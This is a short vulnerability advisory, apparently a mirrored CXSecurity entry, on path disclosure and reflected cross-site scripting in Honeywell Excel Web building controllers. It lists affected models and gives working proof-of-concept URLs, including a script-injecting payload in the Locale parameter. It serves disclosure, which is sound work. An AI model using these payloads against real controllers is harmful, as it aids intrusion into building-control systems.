Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure - CXSecurity.com-漏洞情报、漏洞详情、安全漏洞、CVE

Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure - CXSecurity.com

漏洞ID	1820170	漏洞类型
发布时间	2019-11-12	更新时间	2019-11-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	N/A	CVSS评分	N/A

# Honeywell MCR Web Controller
# Full Path Disclosure & Cross Site Scripting

# Vendor Homepage: https://www.honeywell.com
# WebVersion:
XL1000C50 EXCEL WEB 52 I/O,
XL1000C500 EXCEL WEB 300 I/O,
XL1000C100 EXCEL WEB 104 I/O,
XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL,
XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C1000U EXCEL WEB 600 I/O UUKL.

# Tested on: EXCEL WEB - AIT AG XL1000C1000U
600 I/O UUKL - 05.03.2008

# Date: Nov 09, 2019
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>

# Full Path Disclosure
http://<excel-web.host>/standard/login/help.php
http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0

# Cross Site Scripting
http://
<excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22

Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure - CXSecurity.com

|漏洞来源

|漏洞详情

|漏洞EXP

检索漏洞

相关漏洞